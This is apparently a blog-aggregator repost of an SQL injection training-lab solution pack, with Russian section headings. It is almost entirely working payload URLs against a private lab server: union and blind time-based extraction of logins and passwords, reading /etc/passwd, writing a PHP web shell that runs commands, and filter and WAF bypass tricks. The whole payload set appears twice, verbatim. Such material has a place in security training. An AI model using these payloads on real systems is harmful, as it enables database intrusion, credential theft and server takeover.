advanced-sql-injection-lab-full-pack
2011-01-17 12:16
288 查看
1.1 "Внедрение операторов SQL[/b]" (SQL[/b] INJECTION[/b])
http://192.168.0.51/
'or 1=1--
http://192.168.0.51/action2.php?id=14+OR+1=1-- http://192.168.0.51/action2.php?id=14+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns-- http://192.168.0.51/action2.php?id=14+union+select+concat_ws(0x3a,id,login,password,name)+from+users--
1.2 "Слепое внедрение операторов SQL[/b]" (BLIND SQL[/b] INJECTION[/b])
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+limit+0,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+3,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+4,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,login,password)+from+users1+limit+0,1)))-- http://192.168.0.51:81/actions.php?f=1+and+sleep(10)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='2',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),2,1)))='b',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),3,1)))='l',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),4,1)))='i',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),5,1)))='n',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),6,1)))='d',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),7,1)))='s',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),8,1)))='q',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),9,1)))='l',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),10,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),11,1)))='d',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),12,1)))='m',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),13,1)))='i',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),14,1)))='n',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),15,1)))=':',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),16,1)))='p',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),17,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),18,1)))='r',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),19,1)))='0',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),20,1)))='l',sleep(10),1)--
1.3 Работа с файловой системой при эксплуатации уязвимости SQL[/b] INJECTION[/b]
http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/etc/passwd')-- http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/')-- http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/usr/local/www/apache22/data3/tmp/')-- http://192.168.0.51:8080/index.php?fl=5+union+select+'test'+into+dumpfile+'/usr/local/www/apache22/data3/tmp/test.txt'--
1.4 Выполнение команд на сервере при эксплуатации уязвимости SQL[/b] INJECTION[/b]
http://192.168.0.51:8080/index.php?fl=5+union+select+'<? system($_GET[cmd]); ?>'+into+dumpfile+'/usr/local/www/apache22/data3/shells//test.php'--
http://192.168.0.51:8080/shells/test.php?cmd=ls
1.5 Обход программных фильтров безопасности при эксплуатации уязвимости SQL[/b] INJECTION[/b]
http://192.168.0.51:8585/hex.php http://192.168.0.51:8585/actions.php?d=1/*%00*/or+1=1-- http://192.168.0.51:8585/actions.php?d=1/*%00*/or/**/1=1 http://192.168.0.51:8585/actions.php?d=1/*%00*/uni--on/**/se--lect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/AND/**/table_name/**/not/**/in(0x616374696F6E73) http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/0,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/3,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/4,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x2e,table_schema,table_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/2,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,username,pass)/**/from/**/web4.usersdb/**/limit/**/0,1/**/un--ion/**/sel--ect/**/1
1.6 Обход Web Application Firewall (WAF) при эксплуатации уязвимости SQL[/b] INJECTION[/b]
http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,3 http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,table_name+information_schema.columns http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,3+from+users http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b)a http://192.168.0.51:9191/index.php?id=1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b+using(id))a http://192.168.0.51:9191/index.php?id=1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b+using(id,wafusr,pwdwwaff))a http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+wafusr,pwdwwaff,priv+from+users
ЗЫ: с учетом метода, приведенного в предыдущем посте, часть 1.6 может выполняться гораздо проще;)
http://192.168.0.51/
'or 1=1--
http://192.168.0.51/action2.php?id=14+OR+1=1-- http://192.168.0.51/action2.php?id=14+union+select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns-- http://192.168.0.51/action2.php?id=14+union+select+concat_ws(0x3a,id,login,password,name)+from+users--
1.2 "Слепое внедрение операторов SQL[/b]" (BLIND SQL[/b] INJECTION[/b])
http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+limit+0,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+0,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+3,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,table_name,column_name)+from+information_schema.columns+where+table_schema!='information_schema'+limit+4,1)))-- http://192.168.0.51:81/actions.php?id=1+AND+extractvalue(1,concat(0x5C,(select+concat_ws(0x3a,login,password)+from+users1+limit+0,1)))-- http://192.168.0.51:81/actions.php?f=1+and+sleep(10)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),1,1)))='2',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),2,1)))='b',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),3,1)))='l',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),4,1)))='i',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),5,1)))='n',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),6,1)))='d',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),7,1)))='s',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),8,1)))='q',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),9,1)))='l',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),10,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),11,1)))='d',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),12,1)))='m',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),13,1)))='i',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),14,1)))='n',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),15,1)))=':',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),16,1)))='p',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),17,1)))='a',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),18,1)))='r',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),19,1)))='0',sleep(10),1)-- http://192.168.0.51:81/actions.php?f=1+AND+if((lower(mid((select+concat_ws(0x3a,login,password)+from+users2+limit+0,1),20,1)))='l',sleep(10),1)--
1.3 Работа с файловой системой при эксплуатации уязвимости SQL[/b] INJECTION[/b]
http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/etc/passwd')-- http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/')-- http://192.168.0.51:8080/index.php?fl=5+union+select+load_file('/usr/local/www/apache22/data3/tmp/')-- http://192.168.0.51:8080/index.php?fl=5+union+select+'test'+into+dumpfile+'/usr/local/www/apache22/data3/tmp/test.txt'--
1.4 Выполнение команд на сервере при эксплуатации уязвимости SQL[/b] INJECTION[/b]
http://192.168.0.51:8080/index.php?fl=5+union+select+'<? system($_GET[cmd]); ?>'+into+dumpfile+'/usr/local/www/apache22/data3/shells//test.php'--
http://192.168.0.51:8080/shells/test.php?cmd=ls
1.5 Обход программных фильтров безопасности при эксплуатации уязвимости SQL[/b] INJECTION[/b]
http://192.168.0.51:8585/hex.php http://192.168.0.51:8585/actions.php?d=1/*%00*/or+1=1-- http://192.168.0.51:8585/actions.php?d=1/*%00*/or/**/1=1 http://192.168.0.51:8585/actions.php?d=1/*%00*/uni--on/**/se--lect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/AND/**/table_name/**/not/**/in(0x616374696F6E73) http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/0,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/3,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,table_name,column_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/4,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x2e,table_schema,table_name)/**/from/**/information_schema.columns/**/where/**/table_schema!=0x696E666F726D6174696F6E5F736368656D61/**/limit/**/2,1/**/un--ion/**/sel--ect/**/1 http://192.168.0.51:8585/actions.php?d=1/*%00*/limit/**/0/**/uni--on/**/se--lect/**/concat_ws(0x3a,username,pass)/**/from/**/web4.usersdb/**/limit/**/0,1/**/un--ion/**/sel--ect/**/1
1.6 Обход Web Application Firewall (WAF) при эксплуатации уязвимости SQL[/b] INJECTION[/b]
http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,3 http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,table_name+information_schema.columns http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+1,2,3+from+users http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b)a http://192.168.0.51:9191/index.php?id=1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b+using(id))a http://192.168.0.51:9191/index.php?id=1+union/*&lang=*/select+*+from(select+*+from+users+join+users+b+using(id,wafusr,pwdwwaff))a http://192.168.0.51:9191/index.php?id=-1+union/*&lang=*/select+wafusr,pwdwwaff,priv+from+users
ЗЫ: с учетом метода, приведенного в предыдущем посте, часть 1.6 может выполняться гораздо проще;)
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- Advanced SQL Injection with MySQL
- Advanced SQL Injection with MySQL
- False SQL Injection and Advanced Blind SQL Injection
- Advanced SQL Injection with MySQL
- Advanced SQL Injection with MySQL
- Advanced SQL Injection In SQL Server Applications
- False SQL Injection and Advanced Blind SQL Injection
- [轉]False SQL Injection and Advanced Blind SQL Injection
- Advanced SQL Injection In SQL Server Applications
- False SQL Injection and Advanced Blind SQL Injection
- AdvancedSQLInjectionwithMySQL
- Full Detailed Basic SQL Injection - Zer0PwN
- Advanced SQL Injection with MySQL
- (转)图解SQL的inner join、left join、right join、full outer join、union、union all的区别
- CCNA(Stand-ALONE)Lab 32-Advanced Extended Access Lists
- SQL FULL JOIN(完全外连接)
- 解决SQL opendatasource打开其他服务器提示'show advanced options被阻止
- 解决macOS下mysql的sql_mode=only_full_group_by问题
- Full Text Search in SQL 2005
- sql server 2005 T-SQL @@PACK_SENT (Transact-SQL)